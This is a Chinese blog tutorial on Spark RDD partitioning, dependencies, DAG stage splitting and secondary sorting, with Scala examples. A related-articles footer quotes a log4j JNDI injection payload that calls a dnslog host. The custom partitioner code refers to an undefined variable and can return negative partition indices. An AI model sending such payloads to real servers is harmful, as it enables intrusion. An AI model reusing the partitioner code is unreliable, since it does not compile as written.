Spark RDD的分区与依赖关系

Spark RDD的分区与依赖关系

RDD分区

RDD,Resiliennt Distributed Datasets,弹性式分布式数据集,是由若干个分区构成的,那么这每一个分区中的数据又是如何产生的呢?这就是RDD分区策略所要解决的问题,下面我们就一道来学习RDD分区相关。

RDD数据分区

Spark目前支持Hash分区和Range分区,用户也可以自定义分区,Hash分区为当前的默认分区,Spark中分区器直接决定了RDD中分区的个数、RDD中每条数据经过Shuffle过程属于哪个分区和Reduce的个数。

分区的决定,就是在宽依赖的过程中才有,窄依赖因为是一对一,分区确定的,所以不需要指定分区操作。

1)Partitioner:在Spark中涉及RDD的分区策略的抽象类为Partitioner,其继承体系如图-27所示,有两个核心的子类实现,一个HashPartitioner,一个RangePartitioner。

图-27 spark Partitioner继承体系

Spark中数据分区的主要工具类(数据分区类),主要用于Spark底层RDD的数据重分布的情况中,主要方法两个,如图-28所示:

图-28 Partitioner抽象类

2)HashPartitioner:Spark中非常重要的一个分区器,也是默认分区器,默认用于90%以上的RDD相关API上。

功能:依据RDD中key值的hashCode的值将数据取模后得到该key值对应的下一个RDD的分区id值,支持key值为null的情况,当key为null的时候,返回0;该分区器基本上适合所有RDD数据类型的数据进行分区操作;但是需要注意的是,由于JAVA中数组的hashCode是基于数组对象本身的,不是基于数组内容的,所以如果RDD的key是数组类型,那么可能导致数据内容一致的数据key没法分配到同一个RDD分区中,这个时候最好自定义数据分区器,采用数组内容进行分区或者将数组的内容转换为集合。HashPartitioner代码如下:

def main(args: Array[String]): Unit = {
val conf: SparkConf = new SparkConf().setAppName("demo").setMaster("local[*]")
val sc = new SparkContext(conf)
sc.setLogLevel("WARN")
//加载数据
val rdd = sc.parallelize(List((1,3),(1,2),(2,4),(2,3),(3,6),(3,8)),8)
//通过Hash分区
val result: RDD[(Int, Int)] = rdd.partitionBy(new org.apache.spark.HashPartitioner(2))
//获取分区方式
println(result.partitioner)
//获取分区数
println(result.getNumPartitions)
}

RDD自定义分区

我们都知道Spark内部提供了HashPartitioner和RangePartitioner两种分区策略,这两种分区策略在很多情况下都适合我们的场景。但是有些情况下,Spark内部不能符合我们的需求,这时候我们就可以自定义分区策略。

要实现自定义的分区器,你需要继承 org.apache.spark.Partitioner 类并实现下面三个方法。

1)numPartitions: Int:返回创建出来的分区数。

2)getPartition(key: Any): Int:返回给定键的分区编号(0到numPartitions-1)。

3)equals():Java判断相等性的标准方法。这个方法的实现非常重要,Spark 需要用这个方法来检查你的分区器对象是否和其他分区器实例相同,这样 Spark 才可以判断两个 RDD 的分区方式是否相同。

案例一:模拟实现HashPartitioner。

class CustomerPartitoner(numPartiton:Int) extends Partitioner{// 返回分区的总数override def numPartitions: Int = numPartiton// 根据传入的Key返回分区的索引override def getPartition(key: Any): Int = {key.hashCode()%numparts}}object CustomerPartitoner {def main(args: Array[String]): Unit = {val sparkConf = new SparkConf().setAppName("CustomerPartitoner").setMaster("local[*]")val sc = new SparkContext(sparkConf)//zipWithIndex该函数将RDD中的元素和这个元素在RDD中的ID(索引号)组合成键/值对。val rdd = sc.parallelize(0 to 10,1).zipWithIndex()val func = (index:Int,iter:Iterator[(Int,Long)]) =>{iter.map(x => "[partID:"+index + ", value:"+x+"]")}val r = rdd.mapPartitionsWithIndex(func).collect()for (i <- r){println(i)}val rdd2 = rdd.partitionBy(new CustomerPartitoner(5))val r1 = rdd2.mapPartitionsWithIndex(func).collect()println("----------------------------------------")for (i <- r1){println(i)}println("----------------------------------------")sc.stop()}}

总结:

1)分区主要面对KV结构数据,Spark内部提供了两个比较重要的分区器,Hash分区器和Range分区器。

2)hash分区主要通过key的hashcode来对分区数求余,hash分区可能会导致数据倾斜问题,Range分区是通过水塘抽样的算法来将数据均匀的分配到各个分区中。

3)自定义分区主要通过继承partitioner抽象类来实现,必须要实现两个方法:numPartitions 和 getPartition(key: Any)。

RDD依赖关系

RDD和它依赖的父RDD的关系有两种不同的类型,即窄依赖(narrow dependency)和宽依赖(wide dependency)。

依赖关系

图-29是源码中的一张图,可以发现一个问题Dependency(依赖)的意思可以发现ShuffleDependency是其子类(即宽依赖),NarrowDependency是其子类(即窄依赖)。

图-29 Dependency体系

1)宽窄依赖:所谓窄依赖,指的是子RDD一个分区中的数据,来自于上游RDD中一个分区。所谓宽依赖,指的是子RDD一个分区中的数据,来自于上游RDD所有的分区。

宽窄依赖关系示例如图-30所示:

图-30 宽窄依赖示例图

2)血统Lineage:RDD只支持粗粒度转换,即在大量记录上执行的单个操作。将创建RDD的一系列Lineage(即血统)记录下来,以便恢复丢失的分区。RDD的Lineage会记录RDD的元数据信息和转换行为,当该RDD的部分分区数据丢失时,它可以根据这些信息来重新运算和恢复丢失的数据分区。关于linage说明示意图如图-31所示:

图-31 lineage示例图

3)DAG有向无环图:如果一个有向图无法从某个顶点出发经过若干条边回到该点,则这个图是一个有向无环图。有向图中一个点经过两种路线到达另一个点未必形成环,因此有向无环图未必能转化成树,但任何有向树均为有向无环图。通俗的来说就是有方向,没有回流的图可以称为有向无环图,示意图如图-32所示。

图-32 有像无环图

4)RDD任务的切分:对于RDD的任务切分,可以很形象的如图-33所示。

图-33 RDD任务的切分

并行度:程序同一时间执行作业的线程个数。

原始的RDD通过一系列的转换就就形成了DAG,根据RDD之间的依赖关系的不同将DAG划分成不同的Stage,如图-34所示。

图-34 RDD stage的切分

对于窄依赖,partition的转换处理在Stage中完成计算。对于宽依赖,由于有Shuffle的存在,只能在parent RDD处理完成后,才能开始接下来的计算,因此宽依赖是划分Stage的重要依据。Stage阶段计算过程如图所示-35所示。

图-35 RDD stage阶段计算过程

任务生成和提交的四个阶段

Spark任务生产和提交的四个步骤可以归纳如下:

1)构建DAG:用户提交的job将首先被转换成一系列RDD并通过RDD之间的依赖关系构建DAG,然后将DAG提交到调度系统。

DAG描述多个RDD的转换过程,任务执行时,可以按照DAG的描述,执行真正的计算。

DAG是有边界的:开始(通过sparkcontext创建的RDD),结束(触发action,调用runjob就是一个完整的DAG形成了,一旦触发action,就形成了一个完整的DAG)。

一个RDD描述了数据计算过程中的一个环节,而一个DAG包含多个RDD,描述了数据计算过程中的所有环节。

一个spark application可以包含多个DAG,取决于具体有多少个action。

2)DAGScheduler:将DAG切分stage(切分依据是shuffle),将stage中生成的task以taskset的形式发送给TaskScheduler

为什么要切分stage?

一个是复杂业务逻辑(将多台机器上具有相同属性的数据聚合到一台机器上:shuffle)。

如果有shuffle,那么就意味着前面阶段产生结果后,才能执行下一个阶段,下一个阶段的计算依赖上一个阶段的数据。

在同一个stage中,会有多个算子,可以合并到一起,我们很难称其为pipeline(流水线,严格按照流程、顺序执行)。

3)TaskScheduler:调度task(根据资源情况将task调度到Executors).

4)Executors:接收task,然后将task交给线程池执行。

具体可以简化为如图-38所示。

图-38 spark任务生成和提交图

排序

TopN

topN就是上述sortBy/sortByKey之后执行action操作take(N),或者直接takeOrderd(N),建议使用后者,效率高于前者。具体操作省略。

二次排序

所谓二次排序,指的是排序字段不唯一,有多个,共同排序,仍然使用上面的数据,对学生的身高和年龄一次排序。

object SecondSortOps {def main(args: Array[String]): Unit = {val conf = new SparkConf().setAppName(s"${SecondSortOps.getClass.getSimpleName}").setMaster("local[2]")val sc = new SparkContext(conf)//sortByKey 数据类型为k-v,且是按照key进行排序val personRDD:RDD[Person] = sc.parallelize(List(Person(1, "吴轩宇", 19, 168),Person(2, "彭国宏", 18, 175),Person(3, "随国强", 18, 176),Person(4, "闫  磊", 20, 180),Person(5, "王静轶", 18, 168)))personRDD.map(stu => (stu, null)).sortByKey(true, 1).foreach(p => println(p._1))sc.stop()}}case class Person(id:Int, name:String, age:Int, height:Double) extends Ordered[Person] {//对学生的身高和年龄依次排序override def compare(that: Person) = {var ret = this.height.compareTo(that.height)if(ret == 0) {ret = this.age.compareTo(that.age)}ret}}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/831288.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

<Linux> 权限

目录 权限人员相对于文件来说的分类更改权限文件的拥有者与所属组 权限 权限是操作系统用来限制对资源访问的机制&#xff0c;权限一般分为读、写、执行。系统中的每个文件都拥有特定的权限、所属用户及所属组&#xff0c;通过这样的机制来限制哪些用户、哪些组可以对特定文件…

VULHUB复现log4j反序列化漏洞-CVE-2021-44228

本地下载vulhub复现就完了&#xff0c;环境搭建不讲&#xff0c;网上其他文章很好。 访问该环境&#xff1a; POC 构造&#xff08;任选其一&#xff09;&#xff1a; ${jndi:ldap://${sys:java.version}.xxx.dnslog.cn} ${jndi:rmi://${sys:java.version}.xxx.dnslog.cn}我是…

双向链表专题

文章目录 目录1. 双向链表的结构2. 双向链表的实现3. 顺序表和双向链表的优缺点分析 目录 双向链表的结构双向链表的实现顺序表和双向链表的优缺点分析 1. 双向链表的结构 注意&#xff1a; 这⾥的“带头”跟前面我们说的“头节点”是两个概念&#xff0c;带头链表里的头节点…

C#描述-计算机视觉OpenCV(3):重映射

C#描述-计算机视觉OpenCV&#xff08;3&#xff09;&#xff1a;重映射 前言色彩波形图像重映射 前言 C#描述-计算机视觉OpenCV&#xff08;1&#xff09;&#xff1a;基础操作 C#描述-计算机视觉OpenCV&#xff08;2&#xff09;&#xff1a;图像处理 在前文中&#xff0c;描…

UI-Diffuser——使用生成性人工智能的UI原型设计

概述。 移动UI是影响参与度的一个重要因素&#xff0c;例如用户对应用的熟悉程度和使用的便利性。如果你有一个类似的应用程序&#xff0c;你可能会选择一个具有现代、好看的设计的应用程序&#xff0c;而不是一个旧的设计。然而&#xff0c;要从头开始研究什么样的UI最适合应…

Java中使用Redis实现分布式锁的三种方式

1. 导语 随着软件开发领域的不断演进,并发性已经成为一个至关重要的方面,特别是在资源跨多个进程共享的分布式系统中。 在Java中,管理并发性对于确保数据一致性和防止竞态条件至关重要。 Redis作为一个强大的内存数据存储,为在Java应用程序中实现分布式锁提供了一种高效的…

静态库、动态库回顾

回顾一下库相关的知识点&#xff0c;总结备忘一下。在某种情况下&#xff0c;你有了如下的代码&#xff0c;结构如下 //pra.h #include <stdio.h> void test_01(); //pra.c #include "pra.h" void test_01() {printf("xxxxxxx----->%s %s()\n",…

typescript类型检查和原始类型

typescript类型检查和原始类型 类型检查 非严格类型是typescript默认的类型检查模式&#xff0c;在该模式下&#xff0c;类型检查的规则相对轻松&#xff0c;不会对undefined和null值做过多的限制&#xff0c;允许将undefined和null值赋给string类型的变量。进行JavaScript代…

【ChatGPT with Date】使用 ChatGPT 时显示消息时间的插件

文章目录 1. 介绍2. 使用方法2.1 安装 Tampermonkey2.2 安装脚本2.3 使用 3. 配置3.1 时间格式3.2 时间位置 4. 反馈5. 未来计划6. 开源协议7. 供给开发者自定义修改脚本的文档7.1 项目组织架构7.2 定义新的 Component(1) 定义一个新的 Component 类(2) 注册该 Component 7.3 一…

ICode国际青少年编程竞赛- Python-1级训练场-基本操作

ICode国际青少年编程竞赛- Python-1级训练场-基本操作 1、 Dev.step(3)2、 Dev.step(1)3、 Dev.step(7)4、 Dev.step(-1)5、 Dev.step(-5)6、 Dev.step(3) Dev.step(-8)7、 Dev.turnRight() Dev.step(1)8、 Dev.turnLeft() Dev.step(1)9、 Dev.step(4) Dev.tur…

自动找出字符串中有符号数字

需求 代码 class Solution:def myAtoi(self, s: str) -> int:s s.strip() # 删除首尾空格if not s: return 0 # 字符串为空则直接返回res, i, sign 0, 1, 1int_max, int_min, bndry 2 ** 31 - 1, -2 ** 31, 2 ** 31 // 10if s[0…

2024年 Java 面试八股文——SpringMVC篇

目录 1.简单介绍下你对springMVC的理解? 2.说一说SpringMVC的重要组件及其作用 3.SpringMVC的工作原理或流程 4.SpringMVC的优点 5.SpringMVC常用注解 6.SpringMVC和struts2的区别 7.怎么实现SpringMVC拦截器 8.SpringMvc的控制器是不是单例模式&#xff1f;如果是&am…

B树:原理、操作及应用

B树&#xff1a;原理、操作及应用 一、引言二、B树概述1. 定义与性质2. B树与磁盘I/O 三、B树的基本操作1. 搜索&#xff08;B-TREE-SEARCH&#xff09;2. 插入&#xff08;B-TREE-INSERT&#xff09;3. 删除&#xff08;B-TREE-DELETE&#xff09; 四、B树的C代码实现示例五、…

蓝桥杯练习系统(算法训练)ALGO-953 混合积

资源限制 内存限制&#xff1a;256.0MB C/C时间限制&#xff1a;1.0s Java时间限制&#xff1a;3.0s Python时间限制&#xff1a;5.0s 问题描述 众所周知&#xff0c;人人都在学习线性代数&#xff0c;既然都学过&#xff0c;那么解决本题应该很方便。   宇宙大战中&…

如何在postman上提交文件格式的数据

如何在postman上提交文件格式的数据 今天在写一个文件上传的功能接口时&#xff0c;想用postman进行提交&#xff0c;花了些时间才找到在postman提交文件格式的数据。记录一下吧&#xff01; 1.打开postman&#xff0c;选择POST提交方式&#xff0c;然后在Params那一行的Head…

数据分析--客户价值分析RFM(K-means聚类/轮廓系数)

原数据 import os import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns from sklearn import metrics ### 数据抽取&#xff0c;读⼊数据 df pd.read_csv("customers1997.csv") #相对路径读取数据 print(df.info()) pr…

WPF之自定义绘图

1&#xff0c;创建自定义控件类 class CustomDrawnElement:FrameworkElement{public static readonly DependencyProperty BackgroundColorProperty;static CustomDrawnElement(){FrameworkPropertyMetadata meta new FrameworkPropertyMetadata(Colors.SkyBlue);meta.Affects…

Python-------实现人生重开模拟器

人生重开模拟器 代码展示:实现思路序言一、设置初始属性1.游戏标题2.属性初始化 二、设置角色性别三、设置角色出生点四、针对每一年的岁数&#xff0c;自动生成人生经历总结 代码展示: # 人生重开模拟器 import random import sys import timeprint(------------------------…

服务器IP选择

可以去https://ip.ping0.cc/查看IP的具体情况 1.IP位置--如果是国内用&#xff0c;国外服务器的话建议选择日本&#xff0c;香港这些比较好&#xff0c;因为它们离这里近&#xff0c;一般延时低&#xff08;在没有绕一圈的情况下&#xff09;。 不过GPT的话屏蔽了香港IP 2. 企…

GPT是什么?直观解释Transformer | 深度学习第5章 【3Blue1Brown 官方双语】

【官方双语】GPT是什么&#xff1f;直观解释Transformer | 深度学习第5章 0:00 - 预测&#xff0c;采样&#xff0c;重复&#xff1a;预训练/生成式/Transformer模型 3:03 - Transformer 的内部结构 6:36 - 本期总述 7:20 - 深度学习的大框架 12:27 - GPT的第一层&#xff1a;…